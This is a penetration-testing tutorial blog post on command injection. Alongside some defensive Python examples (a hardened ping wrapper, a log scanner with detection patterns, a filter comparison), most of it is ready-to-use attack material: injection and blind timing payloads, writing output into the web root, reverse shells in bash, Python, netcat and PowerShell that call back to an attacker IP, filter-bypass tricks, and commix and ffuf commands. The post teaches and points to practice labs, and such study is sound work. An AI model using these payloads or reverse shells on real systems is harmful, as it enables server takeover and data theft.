Post 4: Command Injection
Turning Web Inputs into System Shells
Command Injection occurs when user input is passed directly to the system shell without proper sanitization. This allows an attacker to run arbitrary commands — and in many cases, it leads directly to remote code execution (RCE).
This post walks you through finding, confirming, and exploiting command injection — manually and reliably.
Table of Contents
- What is Command Injection?
- Identifying Vulnerable Entry Points
- Manual Testing and Payloads
- Getting Command Output
- Turning Injection into a Reverse Shell
- Bypassing Filters
- Practical Tips and Tools
1. What is Command Injection?
Command injection occurs when a web application takes user input and uses it in a system-level command, like:
ping -c 1 $USER_INPUT
Here the shell expands $USER_INPUT into the command line before running it, so if the input isn’t validated, attackers can inject additional commands using shell separators like:
; & && | ||
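To make the two sides of this concrete, here is an added Python example (not code from the original post): a small ping wrapper written the vulnerable way, where the input is interpolated into a string the shell parses, beside a hardened version that allowlists the host and runs the program without a shell. The function names and the `ipaddress`-based allowlist are assumptions about how such a tool might be written.

```python
import ipaddress
import subprocess


def build_vulnerable_command(host: str) -> str:
    """Vulnerable pattern: user input is interpolated into a string that the
    shell parses, so ';', '&&', '|', backticks and $() all change the command."""
    return f"ping -c 1 {host}"


def is_safe_host(host: str) -> bool:
    """Allowlist check: accept only a syntactically valid IPv4 or IPv6 address.
    Separators, whitespace, quotes and substitution syntax never parse as one."""
    try:
        ipaddress.ip_address(host.strip())
        return True
    except ValueError:
        return False


def build_safe_argv(host: str) -> list[str]:
    """Hardened pattern: validate against the allowlist, then build an argv list.
    With shell=False the list goes straight to execve(), so the host is exactly
    one argument and no shell ever interprets it."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host.strip()]


def run_ping(host: str, timeout: float = 5.0) -> str:
    """Run the hardened command and return its combined output (assumed helper)."""
    proc = subprocess.run(
        build_safe_argv(host),
        shell=False,
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # Constructed input mirroring the post's "127.0.0.1; whoami" probe, with a
    # harmless second command so the demo does not depend on ping being installed.
    injected = "127.0.0.1; echo INJECTED"
    print("string the vulnerable version hands to the shell:",
          build_vulnerable_command(injected))
    demo = subprocess.run(f"echo {injected}", shell=True,
                          capture_output=True, text=True)
    print("shell=True ran two commands, output:", demo.stdout.split())
    for candidate in ("127.0.0.1", injected):
        try:
            print("hardened argv:", build_safe_argv(candidate))
        except ValueError as exc:
            print("hardened version:", exc)
```

The important design point is that validation and argv construction are separate defences: the allowlist rejects anything that is not an address, and even if validation were later loosened to accept hostnames, `shell=False` means a separator in the value would only ever reach `ping` as part of one argument, never the shell.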
2. Identifying Vulnerable Entry Points
Common places to find command injection:
- Ping tools
- Traceroute pages
- DNS lookup / host resolver tools
- Any form that interacts with the OS
- File upload, unzip, backup tools
Example:
http://target.com/ping?host=127.0.0.1
Try appending:
127.0.0.1; whoami
3. Manual Testing and Payloads
Here are reliable payloads to test for injection:
127.0.0.1; whoami # ; separates commands
127.0.0.1 && whoami # Only runs if first command succeeds
127.0.0.1 | whoami # Pipe output to second command
127.0.0.1 || whoami # Only runs if first command fails
If nothing happens, try blind techniques (timing-based):
127.0.0.1; sleep 5 # Does the page delay?
127.0.0.1 && ping -n 10 127.0.0.1 > nul # Windows delay
4. Getting Command Output
Some applications will show the output directly — jackpot.
If output is hidden, try redirecting it to a web-accessible file (this only works when the account running the command can write to the document root):
127.0.0.1; whoami > /var/www/html/test.txt
Then check:
http://target.com/test.txt
5. Turning Injection into a Reverse Shell
Once you confirm injection, escalate to a reverse shell:
Linux Reverse Shell (bash)
127.0.0.1; bash -i >& /dev/tcp/10.10.14.99/4444 0>&1
Python
127.0.0.1; python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.99",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh"])'
Netcat
127.0.0.1; nc 10.10.14.99 4444 -e /bin/bash
Make sure your listener is up:
nc -lvnp 4444
For Windows:
127.0.0.1 & powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.99/shell.ps1')"
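From the defender's side, the payload styles in sections 3 to 5 are exactly what a detection rule should look for in web server logs. The following is an added Python example, not from the original post: a small scanner that pulls query parameters out of constructed Apache-style access-log lines, URL-decodes each value, and tags the indicator families seen above (separators, command substitution, timing probes, reverse-shell primitives). The log lines, the `/ping?host=` endpoint and the indicator patterns are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns, derived from the payload styles shown in sections 3 to 5.
# They run on the URL-decoded parameter value, so encoding alone does not hide them.
INDICATORS = {
    "separator": re.compile(r"[;|&]"),
    "substitution": re.compile(r"\$\(|`"),
    "timing": re.compile(r"\bsleep\s+\d+|\bping\s+-n\s+\d+"),
    "reverse_shell": re.compile(
        r"/dev/tcp/|\bnc\b.*\s-e\s|\bbash\s+-i\b|socket\.socket|DownloadString\("
    ),
}

# Matches the request part of a combined-format access-log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /ping?host=127.0.0.1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /ping?host=127.0.0.1%3B%20whoami HTTP/1.1" 200 540',
    '10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /ping?host=127.0.0.1%3B%20sleep%205 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /ping?host=127.0.0.1%3B%20bash%20-i%20%3E%26%20/dev/tcp/10.10.14.99/4444%200%3E%261 HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:12:00:05 +0000] "GET /ping?host=example.org&count=3 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:06 +0000] "GET /ping?host=127.0.0.1%7C%60whoami%60 HTTP/1.1" 200 512',
]


def extract_params(log_line: str) -> dict[str, str]:
    """Pull the query-string parameters out of one access-log line.
    Splitting on '&' happens before decoding, so an '&' that survives into a
    value must have arrived as %26, which is itself worth flagging."""
    match = REQUEST_RE.search(log_line)
    if not match or "?" not in match.group("path"):
        return {}
    query = match.group("path").split("?", 1)[1]
    params: dict[str, str] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify_value(value: str) -> list[str]:
    """Return the names of every indicator family that matches a decoded value."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(value)]


def scan_log(lines) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, parameter_name, indicators) for each suspicious request."""
    hits = []
    for line in lines:
        client_ip = line.split(" ", 1)[0]
        for name, value in extract_params(line).items():
            tags = classify_value(value)
            if tags:
                hits.append((client_ip, name, tags))
    return hits


if __name__ == "__main__":
    for client_ip, name, tags in scan_log(LOG_LINES):
        print(f"{client_ip} param={name} indicators={','.join(tags)}")
```

Decoding after splitting on `&` is what lets the scanner keep the legitimate `host=example.org&count=3` request clean while still catching an encoded `%26`; the same ordering matters for the application's own input filter.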
6. Bypassing Filters
Web apps often try to block special characters or obvious commands.
Tricks to evade filters:
- URL encode characters:
%3B = ;
%26 = &
%7C = |
- Use command substitution or an alternate shell:
127.0.0.1|`whoami`
127.0.0.1||powershell whoami
- Use command chaining:
127.0.0.1 && echo vulnerable
- Obfuscate commands:
127.0.0.1; $(whoami)
127.0.0.1; `whoami`
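Why these tricks work is easier to see from the filter's side. The following added Python example (not from the original post) puts a naive character blocklist, the kind that inspects the raw value before URL decoding and knows only `;`, `&` and `|`, beside a decode-then-allowlist check, and runs constructed inputs modelled on the payload styles above through both. The filter logic, the `BLOCKED_CHARS` set and the inputs are assumptions for the demo.

```python
import ipaddress
from urllib.parse import unquote

# The three characters a typical hand-written filter knows about (assumed).
BLOCKED_CHARS = (";", "&", "|")


def naive_blocklist_allows(raw_value: str) -> bool:
    """Weak filter: inspects the raw query value before URL decoding and
    only knows the three separators listed above."""
    return not any(ch in raw_value for ch in BLOCKED_CHARS)


def what_the_shell_sees(raw_value: str) -> str:
    """After the filter runs, the framework URL-decodes the value and the app
    concatenates it into the command line, so this is the string the shell parses."""
    return unquote(raw_value)


def allowlist_allows(raw_value: str) -> bool:
    """Hardened filter: decode first, then accept only a valid IP address.
    Every trick in section 6 fails this check because none of them is an address."""
    try:
        ipaddress.ip_address(what_the_shell_sees(raw_value).strip())
        return True
    except ValueError:
        return False


# Constructed inputs based on the payload styles in section 6.
PAYLOADS = [
    "127.0.0.1",               # legitimate input
    "127.0.0.1; whoami",       # raw separator
    "127.0.0.1%3B%20whoami",   # URL-encoded separator
    "127.0.0.1|`whoami`",      # pipe plus backtick substitution
    "`whoami`",                # substitution with no separator at all
]


def evaluate(payloads) -> list[dict]:
    """Run each input through both filters and record whether the blocklist
    let through something the allowlist rejected (a bypass)."""
    rows = []
    for raw in payloads:
        blocklist_ok = naive_blocklist_allows(raw)
        allowlist_ok = allowlist_allows(raw)
        rows.append({
            "payload": raw,
            "decoded": what_the_shell_sees(raw),
            "blocklist_allows": blocklist_ok,
            "allowlist_allows": allowlist_ok,
            "bypasses_blocklist": blocklist_ok and not allowlist_ok,
        })
    return rows


if __name__ == "__main__":
    for row in evaluate(PAYLOADS):
        flag = "BYPASS" if row["bypasses_blocklist"] else "ok"
        print(f"{flag:6} blocklist={row['blocklist_allows']!s:5} "
              f"allowlist={row['allowlist_allows']!s:5} shell sees: {row['decoded']!r}")
```

Two of the five inputs slip past the blocklist: the encoded separator because the filter looked at the wrong representation, and the bare backtick substitution because it contains no separator at all. The allowlist rejects both because it asks what the input is rather than what it contains.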
7. Practical Tips and Tools
Manual Testing:
- Burp Repeater — test payloads one by one
- Proxy all requests for deeper analysis
Tools:
- Commix (automated testing):
commix --url="http://target.com/ping?host=127.0.0.1" --technique=BEUSTQ
Use --os-cmd, --os-shell, or --os-pwn options to escalate.
- wfuzz / ffuf to fuzz with payloads:
ffuf -u 'http://target.com/ping?host=FUZZ' -w payloads.txt
Checklist for Command Injection
| Test Area | Description |
|---|---|
| Input fields | Ping, traceroute, DNS lookups |
| Output visibility | Does the command output show up? |
| Blind injection | Does a delay occur when using sleep/ping? |
| Reverse shell capability | Can you run bash, python, nc? |
| Filters in place | Can you bypass input filters? |
| Automation tools | Use commix after manual confirmation |
Practice Targets
- TryHackMe: Command Injection, Vulnversity, Pickle Rick
- PortSwigger Labs: Command injection series
- DVWA and bWAPP: Command Injection modules
Coming Up Next
Post 5: Cross-Site Scripting (XSS)
We’ll dive into:
- Reflected vs Stored vs DOM XSS
- Writing and testing payloads
- Bypassing filters and WAFs
- Stealing cookies, redirecting users, popping alerts
